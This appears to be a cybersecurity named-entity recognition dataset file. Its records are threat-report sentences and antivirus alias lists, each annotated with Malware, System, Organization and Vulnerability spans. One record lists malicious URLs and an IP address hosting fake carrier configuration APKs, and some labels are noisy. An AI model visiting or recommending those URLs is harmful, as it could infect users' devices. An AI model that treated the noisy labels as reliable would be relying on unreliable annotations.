{"text": "These names are mainly related to the propagation of the Trojan, attack activities, such as the initial use of the Driver Life Update Server for propagation, the use of the Eternal Blue vulnerability in the target system, C2 communication and PowerShell script code with the Lemon Duck string, etc.", "spans": {"Vulnerability: the Driver Life Update Server": [[111, 140]], "Vulnerability: the Eternal Blue vulnerability": [[169, 199]], "System: system,": [[214, 221]], "Malware: the Lemon Duck string,": [[271, 293]]}, "info": {"id": "cyner2_valid_001483", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32/Paroc.b Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Paroc.Worm WORM_PAROC.B Win.Worm.Paroc-1 Email-Worm.Win32.Paroc.b Trojan.Win32.Paroc.enlr I-Worm.Win32.Paroc.12288.B Win32.Prosac.12288 Worm.Paroc.Win32.2 WORM_PAROC.B BehavesLike.Win32.FDoSBEnergy.lz W32/Paroc.B I-Worm/Paroc.b WORM/Paroc.B Worm[Email]/Win32.Paroc Worm:Win32/Paroc.A@mm W32.W.Paroc.b!c Email-Worm.Win32.Paroc.b Worm/Win32.Paroc.R55629 Worm.Paroc Win32/Paroc.B I-Worm.Paroc!Wvi+tOd6Ue8 Email-Worm.Win32.Paroc W32/Paroc.B!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001484", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Rimecud.BB Win32.Trojan.WisdomEyes.151026.9950.9999 WORM_PALEVO.SMQM Trojan.Win32.ULPM.cykics Malware.FakeFolder@CV!1.6ABF Trojan.Packed.21635 WORM_PALEVO.SMQM BehavesLike.Win32.Rimecud.dt Trojan/Sasfis.unb Trojan.Razy.DB256 Trojan:Win32/Rimecud.A Worm/Win32.Palevo BScope.P2P-Worm.Palevo Virus.Win32.Virut W32/Palevo.CQQA!worm.p2p Trj/Rimecud.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001485", "source": "cyner2_valid"}}
{"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device .", "spans": {}, "info": {"id": "cyner2_valid_001486", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Heur.DP.rmIfaqjr92e Backdoor:Win32/Kazakiwhale.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001487", "source": "cyner2_valid"}}
{"text": "Interestingly , early “ clean ” versions contain varying levels of signals that the updates will include malicious code later .", "spans": {}, "info": {"id": "cyner2_valid_001488", "source": "cyner2_valid"}}
{"text": "At least one observed phishing lure delivered a Cobalt Strike payload.", "spans": {"Malware: a Cobalt Strike payload.": [[46, 70]]}, "info": {"id": "cyner2_valid_001489", "source": "cyner2_valid"}}
{"text": "It is being used as a launch platform for APT actors including the now well-known Shell_Crew / Deep Panda group.", "spans": {}, "info": {"id": "cyner2_valid_001490", "source": "cyner2_valid"}}
{"text": "This post will also give you insights about the level of sophistication this malware has reached.", "spans": {}, "info": {"id": "cyner2_valid_001492", "source": "cyner2_valid"}}
{"text": "These emails are part of a wave of malware-ridden spam attacks that are currently active in Japan.", "spans": {}, "info": {"id": "cyner2_valid_001493", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Hupigon.YBO Backdoor.Win32.Hupigon.pv Backdoor.Hupigon.YBO Backdoor.Hupigon.YBO BackDoor.Pigeon.194 Trojan-Downloader.Win32.Delf.bcz!IK Backdoor/Hupigon.rsp Backdoor.Hupigon.YBO Virus.Win32.Heur.c Trojan-Downloader.Win32.Delf.aup Backdoor.Win32.Gpigeon2008.acj Trojan-Downloader.Win32.Delf.bcz", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001494", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.JavaNVA.Worm Trojan.Maljava Java/Trupto.A JAVA_CRAT.A Backdoor.Java.CrossRAT.b Trojan.Java.CrossRAT.exmvuo Backdoor.Java.Crossrat!c Java.CrossRat.1 JAVA_CRAT.A Backdoor.Java.gl Java/Trupto.A!tr Backdoor.Java.CrossRAT.b Trojan:Java/Trupto.A Backdoor.Java.CrossRAT Java.Backdoor.Crossrat.Ebqt Backdoor.Java.CrossRat virus.java.crossrat.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001495", "source": "cyner2_valid"}}
{"text": "This contained malware that we detect as Backdoor:W32/Wonknu.A.", "spans": {"Malware: malware": [[15, 22]]}, "info": {"id": "cyner2_valid_001496", "source": "cyner2_valid"}}
{"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic .", "spans": {}, "info": {"id": "cyner2_valid_001497", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.C01D Trojan-Downloader.Win32.Bredolab W32.W.Joleee.kZ0o Trojan/Pakes.nmc WORM_PKOOBF.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Bredolab.JO WORM_PKOOBF.SM Trojan.Win32.Pakes.nmc Trojan.Win32.MLW.ejone Trojan.Win32.Pakes.29184.I Trojan.Packed.19706 Trojan.Pakes.Win32.79 Trojan/Pakes.gyk Trojan.Win32.Pakes.nmc TrojanDownloader:Win32/Bredolab.X TrojanDownloader.Bredolab Trojan-Downloader.Win32.Bredolab Win32/TrojanDownloader.Bredolab.AA Trojan-Downloader.Win32.Bredolab", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001498", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VB:Trojan.VBS.Downloader.ACP O97M.Downloader.AJK VB:Trojan.VBS.Downloader.ACP Doc.Downloader.Jaff-6316585-1 VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP VB:Trojan.VBS.Downloader.ACP W97M.DownLoader.1738 HEUR_VBA.O2 W97M/Downloader.byw TrojanDownloader:JS/Swabfex.P VB:Trojan.VBS.Downloader.ACP W97M/Downloader.byw OLE.Win32.Macro.703738 WM/Moat.F1678919!tr virus.office.obfuscated.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001499", "source": "cyner2_valid"}}
{"text": "What's interesting to note is that some compromised sites have more value than others and this is especially true when those sites happen to be used to serve ad banners.", "spans": {}, "info": {"id": "cyner2_valid_001500", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Facetake Trojan.Win32.Fbtaken.ewtnbc Trojan.MSIL.Fbtaken W32/Trojan.KQVO-5134 Trojan.MSILPerseus.D9A09 Trojan:Win32/Facetake.A Trj/GdSda.A Trojan.Fbtaken! MSIL/Fbtaken.B!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001501", "source": "cyner2_valid"}}
{"text": "When considered holistically, the intelligence supports the conclusion that this exploitation campaign was purposefully carried out against the backdrop of diplomatic and legal maneuvering.", "spans": {"Organization: intelligence": [[34, 46]]}, "info": {"id": "cyner2_valid_001503", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PUP.PennyBee/Variant Trojan.Symmi.D12F46 Multi.Threats.InArchive Trojan.Win32.Patcher.zw Trojan.Win32.Kazy.dzllhn TrojWare.Win32.Addrop.SHHH Trojan.Lyrics.1951 Trojan-Dropper.Win32.Addrop TR/Taranis.1328 Trojan:Win32/Cuffahlt.C Trojan.Win32.Patcher.zw PUP/Win32.Pennybee.R164339 Trojan.Patcher PUP.Optional.PennyBee Win32/TrojanDropper.Addrop.AB Trojan.DR.Addrop!", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001504", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Scar.451584.C Trojan.Win32.Scar!O BackdoorAPT.Mourdoor.A5 Trojan/Scar.fhql Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.ZFRS-4713 Backdoor.Moudoor Win32/Scar.AAJ Win.Trojan.Scar-835 Trojan.Win32.Scar.fhql Trojan.Win32.Scar.vgdwe Trojan.Win32.A.Scar.451584 Troj.W32.Scar.fhql!c Backdoor:W32/Moudoor.C Trojan.KillProc.14145 Trojan.Scar.Win32.61385 Backdoor.Win32.Moudoor Trojan/Scar.aodk BDS/Moudoor.A.8 W32/Scar.EB!tr Trojan[Backdoor]/Win32.Inject Win32.Troj.Scar.kcloud Trojan.Graftor.D30C3 Trojan.Win32.Scar.fhql Backdoor:Win32/Moudoor.A Trojan/Win32.Scar.C156340 BScope.Trojan.SvcHorse.01643 Trj/CI.A Win32.Trojan.Scar.Lqor Trojan.Scar!rOTamJh5gBg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001508", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Application.Tool.5276 Trojan/W32.HackTool.159744 Tool.NTScan.Win32.26 Aplicacion/NTScan.100 W32/Downloader.BAPG Hacktool.Scan HV_NTSCAN_CA226216.TOMC Application.Tool.5276 not-a-virus:NetTool.Win32.NTScan.100 Application.Tool.5276 Riskware.Win32.NTScan.ifni Nettool.W32.Ntscan!c Win32.Hacktool.Eq.Hpe Application.Tool.5276 ApplicUnsaf.Win32.NetTool.NTScan.kju Application.Tool.5276 Tool.Ntscan W32/Downloader.RYJZ-9055 SPR/NTScan.100 HackTool[NetTool:not-a-virus]/Win32.NTScan Win32.HackTool.NtScan.a.kcloud Application.Tool.D149C NetTool.NTScan.159744.K[h] HackTool:Win32/Ntscan.A Win-AppCare/Hacktool.159744.B Hacktool.Win32.NTScan.100 not-a-virus:NetTool.Win32.NTScan Exploit/Lsass.L Win32/Virus.NetTool.871", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001509", "source": "cyner2_valid"}}
{"text": "It also specifically seeks to harvest game credentials for UPlay, Minecraft, Steam, and Origin.", "spans": {"Organization: UPlay, Minecraft, Steam,": [[59, 83]], "Organization: Origin.": [[88, 95]]}, "info": {"id": "cyner2_valid_001510", "source": "cyner2_valid"}}
{"text": "Gets confirmation, and then—addresses of two servers.", "spans": {"System: two servers.": [[41, 53]]}, "info": {"id": "cyner2_valid_001511", "source": "cyner2_valid"}}
{"text": "This adds an extra layer against detection .", "spans": {}, "info": {"id": "cyner2_valid_001512", "source": "cyner2_valid"}}
{"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption .", "spans": {"Malware: Exodus": [[36, 42]]}, "info": {"id": "cyner2_valid_001513", "source": "cyner2_valid"}}
{"text": "In this latest campaign we observed a total of 20 unique emails between June and August of this year that included two new variants of the CMSTAR Downloader.", "spans": {"Malware: variants": [[123, 131]], "Malware: the CMSTAR Downloader.": [[135, 157]]}, "info": {"id": "cyner2_valid_001514", "source": "cyner2_valid"}}
{"text": "Since early 2014, an attacker group of Iranian origin has been actively targeting persons of interest by means of malware infection, supported by persistent spear phishing campaigns.", "spans": {"Malware: malware": [[114, 121]], "Malware: spear phishing campaigns.": [[157, 182]]}, "info": {"id": "cyner2_valid_001515", "source": "cyner2_valid"}}
{"text": "Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim's system.", "spans": {"System: a control server": [[35, 51]], "Malware: malware, Seduploader,": [[83, 104]], "System: a victim's system.": [[110, 128]]}, "info": {"id": "cyner2_valid_001516", "source": "cyner2_valid"}}
{"text": "Unlike other rooting malware , this Trojan not only installs its modules into the system , it also injects malicious code into the system runtime libraries .", "spans": {}, "info": {"id": "cyner2_valid_001517", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Android.Trojan.FakeApp.AT Android.Gluper.A Android.Trojan.FakeApp.AT TROJ_FRS.0NA003GL17 HEUR:Trojan.AndroidOS.Rootnik.ay A.L.Rog.AdiEpln Troj.Androidos.Rootnik!c Trojan.Android.Gluper.a Trojan:Android/FakeApp.AC Android.HiddenAds.48.origin TROJ_FRS.0NA003GL17 Trojan/Android.Rootnik HEUR:Trojan.AndroidOS.Rootnik.ay Backdoor:AndroidOS/Coca.A Android.Trojan.FakeApp.AT", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001518", "source": "cyner2_valid"}}
{"text": "The fake bitmap image embedded as resource The 32-bit stage 2 malware uses a customized loading mechanism ( i.e. , the PE file has a scrambled IAT and relocation table ) and exports only one function .", "spans": {}, "info": {"id": "cyner2_valid_001519", "source": "cyner2_valid"}}
{"text": "Take pictures with the embedded camera .", "spans": {}, "info": {"id": "cyner2_valid_001520", "source": "cyner2_valid"}}
{"text": "TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021.", "spans": {}, "info": {"id": "cyner2_valid_001523", "source": "cyner2_valid"}}
{"text": "This blog describes the functionality of ZXShell, as well as the associate rootkits.", "spans": {"Malware: ZXShell,": [[41, 49]], "Malware: the associate rootkits.": [[61, 84]]}, "info": {"id": "cyner2_valid_001525", "source": "cyner2_valid"}}
{"text": "It ’ s a complicated puzzle that can be solved by skilled reverse engineers only with good amount of time , code , automation , and creativity .", "spans": {}, "info": {"id": "cyner2_valid_001527", "source": "cyner2_valid"}}
{"text": "We found no evidence of it being sold or distributed via underground marketplaces or forums.", "spans": {}, "info": {"id": "cyner2_valid_001528", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TarsipMLTD.Trojan Trojan-Downloader.Win32.Small!O Backdoor.Goolelo Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Downbot Trojan-Downloader.Win32.Small.cdmv Trojan.Win32.10240.lcfja Trojan.DownLoad3.5643 Downloader.Small.Win32.55450 W32/Trojan.WWBK-0123 TrojanDownloader.Small.bsls TR/Spy.10240.111 Trojan-Downloader.Win32.Small.cdmv Backdoor:Win32/Goolelo.A Downloader/Win32.Small.R103572 Trojan.Downloader.Small.dkfq TrojanDownloader.Small Win32.Trojan-downloader.Small.Airx Trojan.DL.Small!YyNlwcptazw Trojan-Downloader.Win32.Small", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001529", "source": "cyner2_valid"}}
{"text": "Crypto ransomware affecting Australian computers uses Breaking Bad theme in ransom demand.", "spans": {"Malware: Crypto ransomware": [[0, 17]], "System: Australian computers": [[28, 48]]}, "info": {"id": "cyner2_valid_001531", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Android.Shedun.E Android.Trojan-Dropper.Shedun.b Other:Android.Reputation.2 A.L.Rog.SexVideo.EI Trojan.Android.MLW.ebzlbe Android.DownLoader.329.origin Trojan[Dropper]/Android.Shedun.v Android-PUP/SmsPay.72a8b a.gray.tatic Trojan-Dropper.AndroidOS.Shedun Android/Piom.JO!tr Win32/Trojan.ecf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001532", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Refroso.615936.D Trojan-Proxy.Win32.Banker!O Trojan.Banload Trojan.Zusy.D2500 TROJ_SPNR.35CB13 Win32.Trojan.WisdomEyes.16070401.9500.9993 TROJ_SPNR.35CB13 Trojan-Proxy.Win32.Banker.bv Trojan.Win32.Refroso.tsqgp Trojan.AVKill.20451 BehavesLike.Win32.Trojan.jc Win32.Malware Trojan/Refroso.aglg TrojanProxy:Win32/Yakyord.A Trojan-Proxy.Win32.Banker.bv Trojan/Win32.Refroso.R30410 Trojan.ChePro Trojan.ProxyChanger.EX Trojan.ChePro!ZtCA13Hkpps W32/ChePro.ASE!tr Win32/Trojan.e6d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001533", "source": "cyner2_valid"}}
{"text": "Some of the targets are diplomatic or have strategic commercial interests.", "spans": {}, "info": {"id": "cyner2_valid_001534", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Obator.Win32.1 Trojan/Spy.Obator.a Trojan.Win32.Obator.dllhps Infostealer.Obator TROJ_OBATOR.J TrojanSpy.Obator! Trojan.Win32.Z.Obator.53262[h] Trojan.PWS.Spy.19227 TROJ_OBATOR.J W32/Trojan.SXYF-8193 TR/Spy.Obator.53262 W32/Obator.A!tr.spy Backdoor:Win32/Mizzmo.B Trojan.Win32.Obator.A Win32/Spy.Obator.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001535", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Notestuk BKDR_TURNEDUP.SM Trojan.Win32.Changeling.dgpyeo TrojWare.Win32.Changeling.QUK Trojan.DownLoader23.8554 Trojan.Inject.Win32.81036 BKDR_TURNEDUP.SM BehavesLike.Win32.Injector.fh Trojan.Changeling TR/Changeling.A.3949 Trojan.Zusy.D33795 Trojan:Win32/Hombot.A!dha Trojan/Win32.Dynamer.R198258 Trojan.Changeling! Win32/Trojan.d6e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001537", "source": "cyner2_valid"}}
{"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html 2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible .", "spans": {}, "info": {"id": "cyner2_valid_001538", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.151026.9950.9998 TROJ_DOFOIL.SM03 Trojan.Win32.DownLoad3.duajvs TrojWare.Win32.Joinkjot.SRG Trojan.DownLoad3.34193 TROJ_DOFOIL.SM03 BehavesLike.Win32.Downloader.lh Trojan/Sharik.ph W32/Dropper.CZE!tr Dropper/Win32.Necurs.N1311561930 Win32/Tnega.NAOXKOB Hoax.Blocker Trj/CI.A Win32.Backdoor.Napolar.Edyd Inject2.AWXI Trojan.Win32.Injector.BMIZ Win32/Backdoor.9ba", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001539", "source": "cyner2_valid"}}
{"text": "Attackers targeting Far Eastern International Bank FEIB, a commercial firm in Taiwan, moved funds from its accounts to multiple overseas beneficiaries.", "spans": {"Organization: Far Eastern International Bank FEIB,": [[20, 56]], "Organization: commercial firm": [[59, 74]], "Organization: multiple overseas beneficiaries.": [[119, 151]]}, "info": {"id": "cyner2_valid_001540", "source": "cyner2_valid"}}
{"text": "The user's stolen data is sent to the cybercriminals.", "spans": {"Organization: user's": [[4, 10]]}, "info": {"id": "cyner2_valid_001541", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.RansomKD.12603969 A.H.Rog.Myavoda Android.Malware.Trojan Android.Trojan.SLocker.F Android.Trojan.Locker.ck Other:Android.Reputation.2 HEUR:Trojan-Ransom.AndroidOS.Small.k Trojan.RansomKD.12603969 Trojan.Android.Ransom.dgshfp Trojan.RansomKD.12603969 Android.Locker.534.origin ANDROID/Locker.xdjbu Android/Locker.B!tr Trojan[Ransom]/Android.Small Troj.Ransom.Androidos!c HEUR:Trojan-Ransom.AndroidOS.Small.k Android-Trojan/Slocker.9140 Trojan.Android.Small.a Trojan-Ransom.AndroidOS.TestLocker Trojan.RansomKD.12603969", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001542", "source": "cyner2_valid"}}
{"text": "Instead of using an exploit kit, malicious actors have uploaded a rogue Flash ad which further launches another Flash file containing the zero-day exploit.", "spans": {"Malware: exploit kit,": [[20, 32]], "System: Flash": [[112, 117]], "Malware: zero-day exploit.": [[138, 155]]}, "info": {"id": "cyner2_valid_001543", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.StartPage Win32.Trojan.WisdomEyes.16070401.9500.9940 W32/Trojan.HZDE-8958 TROJ_FAM60b.TOMA Win.Trojan.Startpage-651 Trojan.Win32.StartPage.efiqrm Trojan.Shutdowner.Win32.1900 TROJ_FAM60b.TOMA Trojan.Krotten W32/Trojan.HJL Trojan/StartPage.acu W32.Trojan.Sapade TR/StartPage.EQ Trojan/Win32.StartPage Win32.Troj.Small.bv.kcloud Trojan.Win32.A.Krotten.28672 Trojan/Win32.Xema.C86135 Trojan.StartPage Trojan.Sapade!olqJKeKIABg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001544", "source": "cyner2_valid"}}
{"text": "While preparing the materials for my upcoming HITBAMS2016 talk on Kernel Exploit hunting and mitigation, I came across this new variant of Dridex SHA1: 455817A04F9D0A7094038D006518C85BE3892C99, which is rather interesting.", "spans": {"Organization: HITBAMS2016": [[46, 57]], "Vulnerability: Kernel Exploit hunting": [[66, 88]], "Vulnerability: mitigation,": [[93, 104]], "Malware: variant": [[128, 135]], "Malware: Dridex": [[139, 145]]}, "info": {"id": "cyner2_valid_001545", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Troj.Dropper.W32.Small!c W32/Downloader.QAVP-1383 Win32/DVOverride.D Trojan-Dropper.Win32.Small.ajq Trojan.Win32.Darpa.vyklv Trojan.Overture W32/DldrX.IZO TrojanDropper.Small.gkq TR/Dldr.Darpa.D Trojan[Downloader]/Win32.Darpa TrojanDownloader:Win32/Darpa.D Trojan-Dropper.Win32.Small.ajq Dropper/Win32.Small.R65066 TrojanDownloader.Darpa Trj/CI.A Win32/TrojanDownloader.Darpa.D Win32.Trojan-dropper.Small.Taex Trojan-Downloader.Win32.Darpa.d W32/Darpa.C!tr Win32/Trojan.Downloader.86e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001546", "source": "cyner2_valid"}}
{"text": "Two months prior, ITG03 also created another malware JMT Trader and a fake website offering cryptocurrency trading platform.", "spans": {"Malware: malware JMT Trader": [[45, 63]], "Organization: cryptocurrency trading platform.": [[92, 124]]}, "info": {"id": "cyner2_valid_001547", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.TZ.dkkhen W32.Email.Worm.Silly Trojan.Barys.D8DA TrojanSpy:MSIL/Blanajog.A Trojan-PWS.MSIL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001548", "source": "cyner2_valid"}}
{"text": "From governmental networks to corporations, it is possible to find almost anything on xDedic for as little as 6 USD per server.", "spans": {"Organization: governmental networks": [[5, 26]], "Organization: corporations,": [[30, 43]], "System: server.": [[120, 127]]}, "info": {"id": "cyner2_valid_001549", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Email-Worm.Win32.Warezov!O HackTool.Patcher Win32.Trojan.WisdomEyes.16070401.9500.9984 W32.Stration@mm Win32/Stration.AIP TROJ_STRAT.JD Win.Worm.Strationpac-2 Email-Worm.Win32.Warezov.pk Troj.W32.VB.kZhv TrojWare.Win32.GameThief.Nilage.~CRSA Win32.HLLM.Limar TROJ_STRAT.JD W32/Stration.dr Worm.Warezov.cu Email-Worm.Win32.Warezov.pk W32/Stration.dr Worm.Warezov Win32.Warezov W32/Stration.JQ@mm Win32/Worm.Email-Worm.10b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001550", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.KillAV Trojan/Delf.obb TSPY_HUPIGON_BL130363.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9835 Backdoor.Graybird TSPY_HUPIGON_BL130363.TOMC Win.Trojan.Killav-107 Backdoor.Win32.Defsel.dd Trojan.Win32.Paper.bciflq Trojan.Win32.Z.Hupigon.1612192 BackDoor.Paper.28 BehavesLike.Win32.TrojanShifu.tc Trojan-GameThief.Win32.Magania Backdoor:Win32/Defsel.B Backdoor.Win32.Defsel.dd Trj/CI.A Win32/Delf.OMY Win32.Backdoor.Defsel.Swkf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001551", "source": "cyner2_valid"}}
{"text": "SpyNote RAT captured the device ’ s screen activities along with audio using the MediaProjectionCallback functionality ( available with Lollipop , the Android 5.0 release , and later ) and saved the output in a file named \" video.mp4 '' as shown in the following screenshot SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices , as shown in screenshot below : Stealing contacts The ability to steal contacts is a favorite feature for spyware developers , as the stolen contacts can be used to further spread the spyware .", "spans": {"Malware: SpyNote RAT": [[0, 11], [287, 298]], "System: Lollipop": [[136, 144]], "System: Android 5.0": [[151, 162]]}, "info": {"id": "cyner2_valid_001552", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9893 W32/Trojan.ZFVJ-5939 Trojan.Win32.Z.Injector.774656.W Tool.PassView.566 BehavesLike.Win32.Downloader.bc Trojan.MSIL.Crypt TrojanDropper.Demp.kq Trojan/Win32.Bublik Trojan.MSIL.Krypt.2 HackTool:MSIL/Cryptorstub.E Dropper/Win32.Injector.R28775 TrojanDropper.Demp Trj/CI.A MSIL/Injector.ADS Trojan.DR.Demp!46IpNyNSBE8 Win32/Trojan.d60", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001553", "source": "cyner2_valid"}}
{"text": "We were notified of a new ransomware version last night.", "spans": {"Malware: new ransomware": [[22, 36]]}, "info": {"id": "cyner2_valid_001555", "source": "cyner2_valid"}}
{"text": "Sysdig's threat research team recently reported on a fascinating client engagement they conducted, in response to a sophisticated cloud attack resulting in the loss of proprietary data.", "spans": {"Organization: Sysdig's threat research team": [[0, 29]]}, "info": {"id": "cyner2_valid_001556", "source": "cyner2_valid"}}
{"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices .", "spans": {}, "info": {"id": "cyner2_valid_001557", "source": "cyner2_valid"}}
{"text": "During this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT.", "spans": {"Malware: families: TOUCHMOVE, SIDESHOW,": [[73, 103]], "Malware: TOUCHSHIFT.": [[108, 119]]}, "info": {"id": "cyner2_valid_001558", "source": "cyner2_valid"}}
{"text": "Talos recently observed a new campaign specific to South America, namely Brazil.", "spans": {"Organization: Talos": [[0, 5]]}, "info": {"id": "cyner2_valid_001559", "source": "cyner2_valid"}}
{"text": "POS malware target retail companies in an attempt to steal customer payment details, such as credit card information.", "spans": {"Malware: POS malware": [[0, 11]], "Organization: retail companies": [[19, 35]]}, "info": {"id": "cyner2_valid_001560", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnGameWY0DL.Trojan Trojan.Win32.Shiz.3!O Trojan.SimdaCS.S15592 Backdoor.Shiz.Win32.2165 Backdoor/Shiz.bpdh Trojan.Kazy.DDBCC Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Shiz.JRPD-2156 TROJ_SHIZ.SMP6 Win.Trojan.Shiz-2126 Trojan.Win32.Shiz.rqosk TrojWare.Win32.Simda.U Trojan.Packed.20771 TROJ_SHIZ.SMP6 W32/Shiz.DZ Backdoor/Shiz.bse Trojan[Backdoor]/Win32.Shiz Win32.Hack.Shiz.kcloud Trojan:Win32/Simda.U Backdoor.Win32.A.Shiz.290304.A Backdoor/Win32.Shiz.R23510 BScope.TrojanPSW.IBank.1512 Win32/Spy.Shiz.NCF Backdoor.Shiz!a8qwzfHsJPs Trojan.Win32.Simda", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001561", "source": "cyner2_valid"}}
{"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date .", "spans": {"Malware: DualToy": [[0, 7]]}, "info": {"id": "cyner2_valid_001562", "source": "cyner2_valid"}}
{"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing other features , but these aren ’ t as effective .", "spans": {"System: Android 8.0": [[429, 440]], "System: Android": [[530, 537]]}, "info": {"id": "cyner2_valid_001563", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Multi Win.Trojan.Dealply-6391261-0 Uds.Dangerousobject.Multi!c BehavesLike.Win32.BadFile.gh W32/Trojan.CFOO-7699 TR/RedCap.nbeft Trj/GdSda.A Win32.Trojan.Virus.Dvpq Trojan-Downloader.Win32.Stegano Malicious_Behavior.SB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001564", "source": "cyner2_valid"}}
